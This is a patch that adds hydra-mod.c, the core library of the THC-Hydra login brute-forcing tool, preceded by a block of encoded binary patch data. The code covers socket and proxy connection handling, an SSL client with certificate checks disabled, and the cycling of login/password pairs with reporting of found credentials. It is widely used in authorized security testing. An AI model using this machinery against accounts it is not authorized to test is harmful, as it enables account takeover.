zV!rK6Z`b9Li4EJeA9bG;NbSb;rzzWGFvj*$ z@{=2|P2cCGbB_Ai|2;yE?gd(Y7BS8<>uELkCce*F?iUy%%TC18fLYBcuuCp6|BCs~ z`pEmK+)#(SHYwF_jdg80+ETt^nwL5YSv{P@W&m-n$yIM{b}`0#^jV(7?(K6rL{PI2l{r(^Lum@w$3{A z;|SQTy=MDR=pZx9Q*@`=%?#w|s(zcNc>b%CH!r7M53hb;qw*L!3%wA5+_@OUICuSU ziMF9I?rfj&=UTK!1lr}hmBZ8X-!k&A8euMEwMJIJUy8P|r>c#u$!H}%qt>eCVm*Wi zK>EQP^kWCFp4|92lvf$$=24E^RvHsgP-3ZuwQH1aPJ(g2d=Dt8GA0l;0JOS#=1Su;A{d4 z(JJH*W$l|=;g?+kj_hllgWtQ6^(i=@QL#;_)lfOr57mfsAix_>19ecrV51vYBe+p= z&q;&dth>ZE)DeuIyP_^&>`mn|<}7W6URePTrKRKo>|Fd383*_J$kb8?YX)u4kc94?n zomF>nzdyw$#k(~1tyJVzgTQ)^M=YK~i9cMXnk}k7)>-K4;hx{jPdR%!C(TZZ5%u7b zqla3wk^(_eN^zr=1-@LJYgq;{@ZZO+Xu8Qx~_I*3uD_So917N%wZR==euGy8dzJFTN z4J&B(!)r8iV?>&Zhw~oHW&Re9O6unAa(C&GHMH;HCFqk__)+$mI+)iE<8?WTRb*d7 z8Hau_pkDiiGzPi6->n`^k*BwcGLYrO_}IZTVa+HS6+Mt9ZJ0#!4}f2VE)E_jqiRhI zWaD7IFdHy*78YiO3Y9JJ^PYPb#6EAroj-Y8B;7tr%Q4?I9=^zC$e_)zS2v@tY=S-r zTiiWM{=Woc0R6w6hUx{|kijTDj{E(V_?XPn*3vhB(fkJnj2oPma`y^+&S%tVa3?a; zY2INRv#i&6dODRZ5K{MT-91}q#NK$3{~8xL12JoT6u$o|AH>#ZTgIP(rQ$U*$|ELT4E~OtqjWK@Yj0_#S>;#X{rUWT5j1oAY>I~--OT0kK3ab? zo?;Wjfmb{&N`@c1s1&tPg0WKk-(R+dFa zpIoQ)$h+H$`8S7PU$MSt+3QX?hkJC z#Xo$M(4`#%+P8SPX3s{t{NkagpBVpnYr?6Jug^=2iSD=zj#K6Is^$Br^4du1wLOk5 zz#cq`epsqXiJLl=>WlY<9MfYRo=xAankL%aYE-l&Yn zS}-v>y=HlyqJ{-?R?kdZd2WZuGjl(^4!`#B^%OdI?I^9iyq_kn8%ImPu`#z4Iuvnq zUjcnXdCAO7+CLi@^ln}`CUhCr_r=!KPY~m^UUo)~d8Mv$@wNcY#-ML7eT#usNgX(Cu?{;ptuA|4Mv@>v)cU zc1_;dyVxy(pU3`%&c@Rw#&b+hsxqnx?Y^2qC!VHKr6!u6G#UlB(dY6WReB5Uh^hev zUaz^FM0*}y7Uk}Nd#9-H>^zzHbG*iBL*zIujcBn+Z` z;G|hkGDfU3&qE)qhJ86cvLCHM-s7<4Rf+xS`rvBH)dIJlQ@xaBYc?R58LW(h`b-%N zd-f6D`$OC48pg$bj0whm8~pAK;9NJ{OvczfNrPvHU_F}m^N%WH4m{?)yaF%ODx3R! zb{Ay3&S-6j3FuPyMgLjlXxPFM6qh`m&OEwITTbjFpTb@jU30tivCCns?UK`Sa^c!; zFDthzO0oOb(Kh5xOmhn#+t>yHTPVj z)5+R-7nR=SHIutdmeF_N4QS(`RkUo!5}Fz@i-t}ajyalz$gh!}sx-HyNy`V(TFggW zhdHIok~dJ_=>w?C*uk&c4DNodZfL!Ibwcax3+~%7wfp!Xzs%VYOi*+5( zQ=hYQm}vi-a@csSs&dGqF9km!XFkaj3u|=+OXSlJ7}t%iG5>ZH+(Gg(T61bM#U6>F z=;R1mdtxIcT|Pk9AkSiUFNe*t3w}jq5&zJ^3SLL}rJbX7U7m-GKJhDi+0o6hS@)5B zpCA7rl}^D9J%qUCevHfAcT;FP^voud?T|w|P(GbJW^kD-+qQz&?=sOcv+r{o zG)8_x8Q9dUf2|#4(HvuQ^>jJ5ZvQ6H=Dz~HbOmyOxd@I?UIga6#sF}AxP{(m<#C)YxzP1)Vnc{)9qvQzlh}i(4cFJKlZA|!(x4Z8ihc9rGE`lez0=c&H zd=d?s9ZG8<-`?YY8SQX|rmh+LG5(xC$MLdXwQ)B0{Nyf!L0c5-a-9nqD5MRZ=1oa^ z*H8=0#q2U(O5>u+)1GTP=rZhu(~obV&po4A$SphuJ$&u;b4obB9CCM_%h4$gT=lPk8Wv@%=LK zWsF(ov;Iy0O!t|XW9GlPY)ZlW?jzCEYnnT3A;h-YBA>^|^Wx->u|88BWXkgV2$n~g z{;I}Y6ENWW0WVDLcpW~$Ma1+I&tne5!5A90xGQbEeoVxjvEPMx_wmTFtkG1Ox&B5e z{HDMkfj^#00-LiG&jGIszHii=lGLGJQL58gpaJs)8Z^(6Vh>EBRP;T@BjL;%I(+|( zsI!kgI77)8w~PaScNzUC>FQ3}i?}Rf#(Hz>>DYry zv}n&_8oxSJY+oMB?mk#2rjhv@jhQ^r%1(08#!+$@Yq+tkBKB3x7xit}zQKLYr#OXY zX8UtDt`l`6ju!0>r^#!^K;}o$cI?{;UUe6^4<7RY9i89f4<5*1{QdnO&m?Y0aIm+w zQ^c@5?lDD9?a`O|&k<Pl`wyNfC)75Q}U>fkSL*;H*k?_Q@^kKB_L&YH3f~uVP-)?gbQ;5+~ZCZ7{AX zH|5{Bu*BRrNt>K$dn`t0adk4lgRMnZ$XME;+3(Z-b87j>3NV8u$XM5i{KkzI@KM z*%W?Yg;?JT85@rn-U`H=TlXsfURr?v%WFSKz)7pe;F{c~3fOJmw5Ey(`mg_k3#uGf zsJ!G!htUG!bOH@o$Za5@uyCvwHeXNuW((A3hCrPsC~0hTU7Ee6FC{?E9D@!!djBNt zzjcUK9bJg?N{U>MDdv(Df42MC=XLVH{7vNFU`;~gU`p^MoOvD?8a1KLmc@<%%oPM8`18I2f+PUkUwyk5;KC5p&w^&nE`I1c6uJ%P_%Db zOLEPvU>O1IrC6U{z7?-)WqM_;Ry}`g)L6)w1K_AHqMu*MEKx^R)2ftBlyD=365;!E z+4bNGwI5tE6My`c%o~MD=)u>tw9=#!olh-VH-_CJ3tQc zI2eq!;P&7$aK1o2zZYQpVa*ZDOYe%jC{ys0v%=G+DLjL^ujZSWwi;cPKfp3u#vNvL(3wm-3|e)xK)eXapCdjdCp3t$o!5JWY?O>6n}F7smzKVF1QR zx5?=;g)z>GdDc3Q177p6YJfmx!TB)$Mg6g+E#l0`F^Dr5%qlC@^8I)?4Uc8`-?M^4 zn!Vz6Br7*pP{sLSRBFj2D$&0lRSwBRe$73}zqtqbH*=w?f%dc%_>Yh6kLOIEBM>rJ zLjEKG$U#$){CjS>?6Ny$kcTUA=j^nWgGaOnOHNY`{=rK_)#kOiCeT0vTZxY z)-G^DiO>acr?yb-7G|RS0p{mM_qn-2)8wmw{l1)KsT^_;<3ScqWzd(&rj#}XbnBWzs=IP6XYiP4X@c!0=f&iPe0i@O0gca zwmm-*|CR{ka(x>ceXblH_8V;ME#ECzFqb^MbyTv74EW+h3)WG zgOwE2S4~YigQo{~TdE>3FCnDm&L_R==q6tW9;7|4$?N81+Rs?`(Z5*Pf=9zU)i92O`-}7OUcz?%tJWVdx3*Kag}?NK z*OKMmHmlh}PR+X-kk4d?HD#T#rmTyYQ`Wc*@?AqXPOF38BBgxbc+3s*+gJ;?8ZiHr zt-v|SuDKmfZB5xj@rM$r)6kAIHF7eAZ(c@Awl1M*aZ`}*5KO+U^U>;)JLvGeOVlu| zCY22KqH=-WG%|7&?R|2crf(bwKR_zx-!iwPPztmc{$VP7mrLL@nAf-pA5P@-U>|dA zhcUkje};4L&VU=*bMq{%Jg|mpVjW!8@f91H)BNp=XcOd7i>|p4kB9w%e#gJ>X0*w) zfwJkgf66YIMx$(6sElyCW+2C|6gTn})84XmlKpIDr@ro)M}Mh6ajRQJ%2?hmTGnv4 zKymeLPanxmTSws%+EhfKW6*tG|}gRzsz{B-OqmBr3`;76svG26*)J`hNx*#|owH#Oz`9Ftg@t$eaek|5!%CJNA7V4jvPvPrwx%lh>ow#?A zjv@zW3w*bUOZ!sm!PV*H!y7auel|^tpG85V0>IM_plYr1V!d6B$dSz3zL4f5OcU1t z4TT=7)=Wsl8r?hb9@+WWAHCim{-+f4N$R^I7l7wT0n-v@I%$7fTLZ_(jPRxM;BU_-2+nTH=@{C6ehuxpz6U-=`gbA^ zn!#Oi`?Q`AinxA9s?yQ}K1(&|;rY}VJV#sLUk!Gat(|s#o2 zxJKimw`(-BO>5BJjw>qn8Y&iUHQJ zYxVS9OdrJ997OzU2JzbI(wQD!9@7@Ai>4W|5d`0&KIW17U{1zLzxp;*XI_7*l(d;b zcWj`LSslqc6!RgG^T2W~U_dSEKdUp1Uonj4Z(TqGM%JUEeggbD#S!F1aSY_|!v3>( ze#4hAGX;-=CGtHz2LFb6C6OnB4rkjbyV4y##)gv-;&{0H@)2=NYvrN!G8#eq1B09#vgDp8Q6HP_d3B zsW5bHvCv#pr*|dHU+6)5pi`2-0mbczq|naAc>cygyx$+;XMF=qf6AfeUIp_G3+Nnl zbLh+=wCU__+KL=p=Fr%N>M#~MZhX4`*B$-^`+*(d>#?21^X?X5UATDoNLyepZiYX+ z;rt$|734_0rvy_Ua2{FO&#_;}KK7uD!u~h&f$V>zw}FAaUq1-8Ik=lMScm(< zUc`ZmP`_zyY1k5f5&tU9!L7Pkj%0i|re|fZKU2cb_Y~%=99ji_FY&=;De?k@L+yGs_?D z^Cq5yxu>lB6W9BL3uL*}Zj_1!fHzOT+^1Eiw$pUXJ!b!_6xPgecDC^22Y?Nhr((kj zH&4R`TC;yMZ8^D}ww~ETds9y!N9!JV?w7>5Ku2MF9e#F4Y=eVOZ`0f@^RUj9_OXS9 z_}fdLe3$M z@uNeJZ-A@H^&0%(P+UU!{{hBdd<9Q0=Npsewx(_q^x_!kIx(GZ>H&Gv12}V=a2s&{ z?>ZHRM=yb4QC;D)^ZfVhDl?mK+;_;*)drN@#O z^Q?t^;w$ifPd&Uz2Y9-S zM0lgoNPB*aTfQQB-;7`IJryioXkU@CCEFJ$U9?T^0(nDx3V8*(yE~L;-wcZ@xjMT$ zmncx8P?(38TaP~|uJZAt{8RsSba0g&;kia8S)Uc}kLx@JI*pal*lB@OuU)#{=HIGv z^_JX$tzY!xmjurjir=Cc2wTQjy4Sz{x79v=y+7h_i9#)Fhu@Wb#W5e2J$+`T_j~UD zJSG_P%y!_hfx^EPCi3F2op@fmPN!Ukhxsk}v46xn{Hw2l_@^({Rld)1gkxsj;I0dl zLB0g?{u*@T_yTk<^fAYxO*(?dO0Q`G1@si-y*~he-!y0EUk%(J^ziJf8muJ8f(IdX zHkf~BMG*tu%olb@d*qHxP^;w|Ep6qek+*aWG2{pSjU>s?HEz`uu$-=Dn(`zPBx=q$JRuljie)RxxLJ{oh$3+9PF zf2jDa(%hivnBQ0O6mvQd7gx6YigW%u}v3HhU z*O)7t;^4n6MnxH0xT!+)R`S07ObE;TBdL&IW_@>>OJ@B$nvhxlo1CDSGq19gDTFv9)>^CxGqVrs?Y?+K>#P`ami|?CJ z7jej_`@KI`9hO<|>B`mgYYuefYWlO8r$d+|U{m^u`>%6d>iWK(4zp|eyDNFWsUF7l zbbPpt(p=MVV|dcSGU~2e7qJ!LNee?;@rHLvuluLh{rKSuiB0y_mFv#Gs{d@@{hXUb z1a5nTS}-J`o+guJ*59gRe0|k*?0+qjrNPsa;Q{HbO!C%L7azb};0_cfA_8JVtS1R# z1QQP%CblS^CI{CuT3yd|ep_ff)KkPB18)Y&!$1-Hk#T`KUKke|DjtLSGeMG$5I}h= za1X|YdYYiRjv8N+$WOc +#ifdef LIBOPENSSL +#include +#include +#endif +#ifdef HAVE_PCRE +#include +#endif + +#define MAX_CONNECT_RETRY 1 +#define WAIT_BETWEEN_CONNECT_RETRY 3 +#define HYDRA_DUMP_ROWS 16 + +/* rfc 1928 SOCKS proxy */ +#define SOCKS_V5 5 +#define SOCKS_V4 4 +#define SOCKS_NOAUTH 0 + +/* http://tools.ietf.org/html/rfc1929 */ +#define SOCKS_PASSAUTH 2 +#define SOCKS_NOMETHOD 0xff +#define SOCKS_CONNECT 1 +#define SOCKS_IPV4 1 +#define SOCKS_DOMAIN 3 +#define SOCKS_IPV6 4 + +extern int conwait; + +int module_auth_type = -1; +int intern_socket, extern_socket; +char pair[260]; +char HYDRA_EXIT[5] = "\x00\xff\x00\xff\x00"; +char *HYDRA_EMPTY = "\x00\x00\x00\x00"; +char *fe80 = "\xfe\x80\x00"; +int fail = 0; +int alarm_went_off = 0; +int use_ssl = 0; +char ipaddr_str[64]; +int src_port = 0; +int __fck = 0; +int ssl_first = 1; +int __first_connect = 1; +char ipstring[64]; +unsigned int colored_output = 1; + +#ifdef LIBOPENSSL +SSL *ssl = NULL; +SSL_CTX *sslContext = NULL; +RSA *rsa = NULL; +#endif + +/* prototype */ +int my_select(int fd, fd_set * fdread, fd_set * fdwrite, fd_set * fdex, long sec, long usec); + +/* ----------------- alarming functions ---------------- */ +void alarming() { + fail++; + alarm_went_off++; + +/* uh, I think it's not good for performance if we try to reconnect to a timeout system! + * if (fail > MAX_CONNECT_RETRY) { + */ + //fprintf(stderr, "Process %d: Can not connect [timeout], process exiting\n", (int) getpid()); + if (debug) + printf("DEBUG_CONNECT_TIMEOUT\n"); + hydra_child_exit(1); + +/* + * } else { + * if (verbose) fprintf(stderr, "Process %d: Can not connect [timeout], retrying (%d of %d retries)\n", (int)getpid(), fail, MAX_CONNECT_RETRY); + * } + */ +} + +void interrupt() { + if (debug) + printf("DEBUG_INTERRUPTED\n"); +} + +/* ----------------- internal functions ----------------- */ + +int internal__hydra_connect(char *host, int port, int protocol, int type) { + int s, ret = -1, ipv6 = 0; + +#ifdef AF_INET6 + struct sockaddr_in6 target6; + struct sockaddr_in6 sin6; +#endif + struct sockaddr_in target; + struct sockaddr_in sin; + char *buf, *tmpptr = NULL; + int err = 0; + +#ifdef AF_INET6 + memset(&target6, 0, sizeof(target6)); + memset(&sin6, 0, sizeof(sin6)); + if ((host[0] == 16 && proxy_string_ip[0] != 4) || proxy_string_ip[0] == 16) + ipv6 = 1; +#endif + +#ifdef AF_INET6 + if (ipv6) + s = socket(AF_INET6, protocol, type); + else +#endif + s = socket(PF_INET, protocol, type); + if (s >= 0) { + if (src_port != 0) { + int bind_ok = 0; + +#ifdef AF_INET6 + if (ipv6) { + sin6.sin6_family = AF_INET6; + sin6.sin6_port = htons(src_port); + } else +#endif + { + sin.sin_family = PF_INET; + sin.sin_port = htons(src_port); + sin.sin_addr.s_addr = INADDR_ANY; + } + + //we will try to find a free port down to 512 + while (!bind_ok && src_port >= 512) { +#ifdef AF_INET6 + if (ipv6) + ret = bind(s, (struct sockaddr *) &sin6, sizeof(sin6)); + else +#endif + ret = bind(s, (struct sockaddr *) &sin, sizeof(sin)); + + if (ret == -1) { + if (verbose) + perror("internal_hydra_connect error"); + if (errno == EADDRINUSE) { + src_port--; +#ifdef AF_INET6 + if (ipv6) + sin6.sin6_port = htons(src_port); + else +#endif + sin.sin_port = htons(src_port); + } else { + if (errno == EACCES && (getuid() > 0)) { + fprintf(stderr, "[ERROR] You need to be root to test this service\n"); + return -1; + } + } + } else + bind_ok = 1; + } + } + if (use_proxy > 0) { + if (proxy_string_ip[0] == 4) { + memcpy(&target.sin_addr.s_addr, &proxy_string_ip[1], 4); + target.sin_family = AF_INET; + target.sin_port = htons(proxy_string_port); + } +#ifdef AF_INET6 + if (proxy_string_ip[0] == 16) { + memcpy(&target6.sin6_addr, &proxy_string_ip[1], 16); + target6.sin6_family = AF_INET6; + target6.sin6_port = htons(proxy_string_port); + } +#endif + } else { + if (host[0] == 4) { + memcpy(&target.sin_addr.s_addr, &host[1], 4); + target.sin_family = AF_INET; + target.sin_port = htons(port); + } +#ifdef AF_INET6 + if (host[0] == 16) { + memcpy(&target6.sin6_addr, &host[1], 16); + target6.sin6_family = AF_INET6; + target6.sin6_port = htons(port); + } +#endif + } + signal(SIGALRM, alarming); + do { + if (fail > 0) + sleep(WAIT_BETWEEN_CONNECT_RETRY); + alarm_went_off = 0; + alarm(waittime); +#ifdef AF_INET6 +#ifdef SO_BINDTODEVICE + if (host[17] != 0) { + setsockopt(s, SOL_SOCKET, SO_BINDTODEVICE, &host[17], strlen(&host[17]) + 1); + } +#else +#ifdef IP_FORCE_OUT_IFP + if (host[17] != 0) { + setsockopt(s, SOL_SOCKET, IP_FORCE_OUT_IFP, &host[17], strlen(&host[17]) + 1); + } +#endif +#endif + + if (ipv6) + ret = connect(s, (struct sockaddr *) &target6, sizeof(target6)); + else +#endif + ret = connect(s, (struct sockaddr *) &target, sizeof(target)); + alarm(0); + if (ret < 0 && alarm_went_off == 0) { + fail++; + if (verbose && fail <= MAX_CONNECT_RETRY) + fprintf(stderr, "Process %d: Can not connect [unreachable], retrying (%d of %d retries)\n", (int) getpid(), fail, MAX_CONNECT_RETRY); + } + } while (ret < 0 && fail <= MAX_CONNECT_RETRY); + if (ret < 0 && fail > MAX_CONNECT_RETRY) { + if (debug) + printf("DEBUG_CONNECT_UNREACHABLE\n"); + +/* we wont quit here, thats up to the module to decide what to do + * fprintf(stderr, "Process %d: Can not connect [unreachable], process exiting\n", (int)getpid()); + * hydra_child_exit(1); + */ + extern_socket = -1; + ret = -1; + return ret; + } + ret = s; + extern_socket = s; + if (debug) + printf("DEBUG_CONNECT_OK\n"); + + err = 0; + if (use_proxy == 2) { + if ((buf = malloc(4096)) == NULL) { + fprintf(stderr, "[ERROR] could not malloc()\n"); + return -1; + } + memset(&target, 0, sizeof(target)); + if (host[0] == 4) { + memcpy(&target.sin_addr.s_addr, &host[1], 4); + target.sin_family = AF_INET; + target.sin_port = htons(port); + } +#ifdef AF_INET6 + memset(&target6, 0, sizeof(target6)); + if (host[0] == 16) { + memcpy(&target6.sin6_addr, &host[1], 16); + target6.sin6_family = AF_INET6; + target6.sin6_port = htons(port); + } +#endif + + if (hydra_strcasestr(proxy_string_type, "connect") || hydra_strcasestr(proxy_string_type, "http")) { + if (proxy_authentication == NULL) + if (host[0] == 16) + snprintf(buf, 4096, "CONNECT [%s]:%d HTTP/1.0\r\n\r\n", hydra_address2string(host), port); + else + snprintf(buf, 4096, "CONNECT %s:%d HTTP/1.0\r\n\r\n", hydra_address2string(host), port); + else if (host[0] == 16) + snprintf(buf, 4096, "CONNECT [%s]:%d HTTP/1.0\r\nProxy-Authorization: Basic %s\r\n\r\n", hydra_address2string(host), port, proxy_authentication); + else + snprintf(buf, 4096, "CONNECT %s:%d HTTP/1.0\r\nProxy-Authorization: Basic %s\r\n\r\n", hydra_address2string(host), port, proxy_authentication); + + send(s, buf, strlen(buf), 0); + recv(s, buf, 4096, 0); + if (strncmp("HTTP/", buf, 5) == 0 && (tmpptr = index(buf, ' ')) != NULL && *++tmpptr == '2') { + if (debug) + printf("DEBUG_CONNECT_PROXY_OK\n"); + } else { + if (debug) + printf("DEBUG_CONNECT_PROXY_FAILED (Code: %c%c%c)\n", *tmpptr, *(tmpptr + 1), *(tmpptr + 2)); + if (verbose) + fprintf(stderr, "[ERROR] CONNECT call to proxy failed with code %c%c%c\n", *tmpptr, *(tmpptr + 1), *(tmpptr + 2)); + err = 1; + } + free(buf); + } else { + if (hydra_strcasestr(proxy_string_type, "socks5")) { + char buf[1024]; + size_t cnt, wlen; + + /* socks v5 support */ + buf[0] = SOCKS_V5; + buf[1] = 1; + if (proxy_authentication == NULL) + buf[2] = SOCKS_NOAUTH; + else + buf[2] = SOCKS_PASSAUTH; + cnt = hydra_send(s, buf, 3, 0); + if (cnt != 3) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy write failed (%zu/3)\n", cnt); + err = 1; + } else { + cnt = hydra_recv(s, buf, 2); + if (cnt != 2) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy read failed (%zu/2)\n", cnt); + err = 1; + } + if ((unsigned int) buf[1] == SOCKS_NOMETHOD) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy authentication method negotiation failed\n"); + err = 1; + } + /* SOCKS_DOMAIN not supported here, do we need it ? */ + if (err != 1) { + /* send user/pass */ + if (proxy_authentication != NULL) { + //format was checked previously + char *login = strtok(proxy_authentication, ":"); + char *pass = strtok(NULL, ":"); + + snprintf(buf, sizeof(buf), "\x01%c%s%c%s", (char) strlen(login), login, (char) strlen(pass), pass); + + cnt = hydra_send(s, buf, strlen(buf), 0); + if (cnt != strlen(buf)) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy write failed (%zu/3)\n", cnt); + err = 1; + } else { + cnt = hydra_recv(s, buf, 2); + if (cnt != 2) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy read failed (%zu/2)\n", cnt); + err = 1; + } + if (buf[1] != 0) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy authentication failure\n"); + err = 1; + } else { + if (debug) + hydra_report(stderr, "[DEBUG] SOCKS5 proxy authentication success\n"); + } + } + } +#ifdef AF_INET6 + if (ipv6) { + /* Version 5, connect: IPv6 address */ + buf[0] = SOCKS_V5; + buf[1] = SOCKS_CONNECT; + buf[2] = 0; + buf[3] = SOCKS_IPV6; + memcpy(buf + 4, &target6.sin6_addr, sizeof target6.sin6_addr); + memcpy(buf + 20, &target6.sin6_port, sizeof target6.sin6_port); + wlen = 22; + } else { +#endif + /* Version 5, connect: IPv4 address */ + buf[0] = SOCKS_V5; + buf[1] = SOCKS_CONNECT; + buf[2] = 0; + buf[3] = SOCKS_IPV4; + memcpy(buf + 4, &target.sin_addr, sizeof target.sin_addr); + memcpy(buf + 8, &target.sin_port, sizeof target.sin_port); + wlen = 10; +#ifdef AF_INET6 + } +#endif + cnt = hydra_send(s, buf, wlen, 0); + if (cnt != wlen) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy write failed (%zu/%zu)\n", cnt, wlen); + err = 1; + } else { + cnt = hydra_recv(s, buf, 10); + if (cnt != 10) { + hydra_report(stderr, "[ERROR] SOCKS5 proxy read failed (%zu/10)\n", cnt); + err = 1; + } + if (buf[1] != 0) { + /* 0x05 = connection refused by destination host */ + if (buf[1] == 5) + hydra_report(stderr, "[ERROR] SOCKS proxy request failed\n"); + else + hydra_report(stderr, "[ERROR] SOCKS error %d\n", buf[1]); + err = 1; + } + } + } + } + } else { + if (hydra_strcasestr(proxy_string_type, "socks4")) { + if (ipv6) { + hydra_report(stderr, "[ERROR] SOCKS4 proxy does not support IPv6\n"); + err = 1; + } else { + char buf[1024]; + size_t cnt, wlen; + + /* socks v4 support */ + buf[0] = SOCKS_V4; + buf[1] = SOCKS_CONNECT; /* connect */ + memcpy(buf + 2, &target.sin_port, sizeof target.sin_port); + memcpy(buf + 4, &target.sin_addr, sizeof target.sin_addr); + buf[8] = 0; /* empty username */ + wlen = 9; + cnt = hydra_send(s, buf, wlen, 0); + if (cnt != wlen) { + hydra_report(stderr, "[ERROR] SOCKS4 proxy write failed (%zu/%zu)\n", cnt, wlen); + err = 1; + } else { + cnt = hydra_recv(s, buf, 8); + if (cnt != 8) { + hydra_report(stderr, "[ERROR] SOCKS4 proxy read failed (%zu/8)\n", cnt); + err = 1; + } + if (buf[1] != 90) { + /* 91 = 0x5b = request rejected or failed */ + if (buf[1] == 91) + hydra_report(stderr, "[ERROR] SOCKS proxy request failed\n"); + else + hydra_report(stderr, "[ERROR] SOCKS error %d\n", buf[1]); + err = 1; + } + } + } + } else { + hydra_report(stderr, "[ERROR] Unknown proxy type: %s, valid type are \"connect\", \"socks4\" or \"socks5\"\n", proxy_string_type); + err = 1; + } + } + } + } + if (err) { + close(s); + extern_socket = -1; + ret = -1; + free(buf); + return ret; + } + fail = 0; + return ret; + } + return ret; +} + +#ifdef LIBOPENSSL +RSA *ssl_temp_rsa_cb(SSL * ssl, int export, int keylength) { + if (rsa == NULL) { +#ifdef NO_RSA_LEGACY + RSA *private = RSA_new(); + BIGNUM *f4 = BN_new(); + + BN_set_word(f4, RSA_F4); + RSA_generate_key_ex(rsa, 1024, f4, NULL); +#else + rsa = RSA_generate_key(1024, RSA_F4, NULL, NULL); +#endif + } + return rsa; +} + + +int internal__hydra_connect_to_ssl(int socket) { + int err; + + if (ssl_first) { + SSL_load_error_strings(); +// SSL_add_ssl_algoritms(); + SSL_library_init(); // ? + ssl_first = 0; + } + + if (sslContext == NULL) { + /* context: ssl2 + ssl3 is allowed, whatever the server demands */ + if ((sslContext = SSL_CTX_new(SSLv23_client_method())) == NULL) { + if (verbose) { + err = ERR_get_error(); + fprintf(stderr, "[ERROR] SSL allocating context: %s\n", ERR_error_string(err, NULL)); + } + return -1; + } + /* set the compatbility mode */ + SSL_CTX_set_options(sslContext, SSL_OP_ALL); + SSL_CTX_set_options(sslContext, SSL_OP_NO_SSLv2); + SSL_CTX_set_options(sslContext, SSL_OP_NO_TLSv1); + + /* we set the default verifiers and dont care for the results */ + (void) SSL_CTX_set_default_verify_paths(sslContext); + SSL_CTX_set_tmp_rsa_callback(sslContext, ssl_temp_rsa_cb); + SSL_CTX_set_verify(sslContext, SSL_VERIFY_NONE, NULL); + } + + if ((ssl = SSL_new(sslContext)) == NULL) { + if (verbose) { + err = ERR_get_error(); + fprintf(stderr, "[ERROR] preparing an SSL context: %s\n", ERR_error_string(err, NULL)); + } + SSL_set_bio(ssl, NULL, NULL); + SSL_clear(ssl); + return -1; + } + + SSL_set_fd(ssl, socket); + if (SSL_connect(ssl) <= 0) { +// fprintf(stderr, "[ERROR] SSL Connect %d\n", SSL_connect(ssl)); + if (verbose) { + err = ERR_get_error(); + fprintf(stderr, "[VERBOSE] Could not create an SSL session: %s\n", ERR_error_string(err, NULL)); + } + close(socket); + return -1; + } + if (debug) + fprintf(stderr, "[VERBOSE] SSL negotiated cipher: %s\n", SSL_get_cipher(ssl)); + + use_ssl = 1; + + return socket; +} + +int internal__hydra_connect_ssl(char *host, int port, int protocol, int type) { + int socket; + + if ((socket = internal__hydra_connect(host, port, protocol, type)) < 0) + return -1; + + return internal__hydra_connect_to_ssl(socket); +} +#endif + +int internal__hydra_recv(int socket, char *buf, int length) { +#ifdef LIBOPENSSL + if (use_ssl) { + return SSL_read(ssl, buf, length); + } else +#endif + return recv(socket, buf, length, 0); +} + +int internal__hydra_send(int socket, char *buf, int size, int options) { +#ifdef LIBOPENSSL + if (use_ssl) { + return SSL_write(ssl, buf, size); + } else +#endif + return send(socket, buf, size, options); +} + +/* ------------------ public functions ------------------ */ + +void hydra_child_exit(int code) { + char buf[2]; + + if (debug) + printf("[DEBUG] pid %d called child_exit with code %d\n", getpid(), code); + if (code == 0) /* normal quitting */ + __fck = write(intern_socket, "Q", 1); + else if (code == 1) /* no connect possible */ + __fck = write(intern_socket, "C", 1); + else if (code == 2) /* application protocol error or service shutdown */ + __fck = write(intern_socket, "E", 1); + // code 3 means exit without telling mommy about it - a bad idea. mommy should know + else if (code == -1 || code > 3) { + fprintf(stderr, "[TOTAL FUCKUP] a module should not use hydra_child_exit(-1) ! Fix it in the source please ...\n"); + __fck = write(intern_socket, "E", 1); + } + do { + usleep(10000); + } while (read(intern_socket, buf, 1) <= 0); +// sleep(2); // be sure that mommy receives our message + exit(0); // might be killed before reaching this +} + +void hydra_register_socket(int s) { + intern_socket = s; +} + +char *hydra_get_next_pair() { + if (pair[0] == 0) { + pair[sizeof(pair) - 1] = 0; + __fck = read(intern_socket, pair, sizeof(pair) - 1); + //if (debug) hydra_dump_data(pair, __fck, "CHILD READ PAIR"); + if (memcmp(&HYDRA_EXIT, &pair, sizeof(HYDRA_EXIT)) == 0) + return HYDRA_EXIT; + if (pair[0] == 0) + return HYDRA_EMPTY; + } + return pair; +} + +char *hydra_get_next_login() { + if (pair[0] == 0) + return HYDRA_EMPTY; + return pair; +} + +char *hydra_get_next_password() { + char *ptr = pair; + + while (*ptr != '\0') + ptr++; + ptr++; + if (*ptr == 0) + return HYDRA_EMPTY; + return ptr; +} + +void hydra_completed_pair() { + __fck = write(intern_socket, "N", 1); + pair[0] = 0; +} + +void hydra_completed_pair_found() { + char *login; + + __fck = write(intern_socket, "F", 1); + login = hydra_get_next_login(); + __fck = write(intern_socket, login, strlen(login) + 1); + pair[0] = 0; +} + +void hydra_completed_pair_skip() { + char *login; + + __fck = write(intern_socket, "f", 1); + login = hydra_get_next_login(); + __fck = write(intern_socket, login, strlen(login) + 1); + pair[0] = 0; +} + +/* +based on writeError from Medusa project +*/ +void hydra_report_debug(FILE * st, char *format, ...) { + va_list ap; + char buf[8200]; + char bufOut[33000]; + char temp[6]; + unsigned char cTemp; + int i = 0; + + if (format == NULL) { + fprintf(stderr, "[ERROR] no msg passed.\n"); + } else { + va_start(ap, format); + memset(bufOut, 0, sizeof(bufOut)); + memset(buf, 0, 512); + vsnprintf(buf, sizeof(buf), format, ap); + + // Convert any chars less than 32d or greater than 126d to hex + for (i = 0; i < sizeof(buf); i++) { + memset(temp, 0, 6); + cTemp = (unsigned char) buf[i]; + if ((cTemp < 32 && cTemp > 0) || cTemp > 126) { + sprintf(temp, "[%02X]", cTemp); + } else + sprintf(temp, "%c", cTemp); + + if (strlen(bufOut) + 6 < sizeof(bufOut)) + strncat(bufOut, temp, 6); + else + break; + } + fprintf(st, "%s\n", bufOut); + va_end(ap); + } + return; +} + +void hydra_report_found(int port, char *svc, FILE * fp) { + if (!strcmp(svc, "rsh")) + if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] login: \e[32m%s\e[0m\n", port, svc, hydra_get_next_login()); + else + fprintf(fp, "[%d][%s] login: %s\n", port, svc, hydra_get_next_login()); + else if (colored_output) + fprintf(fp, "[\e[31m%d\e[0m][\e[31m%s\e[0m] login: 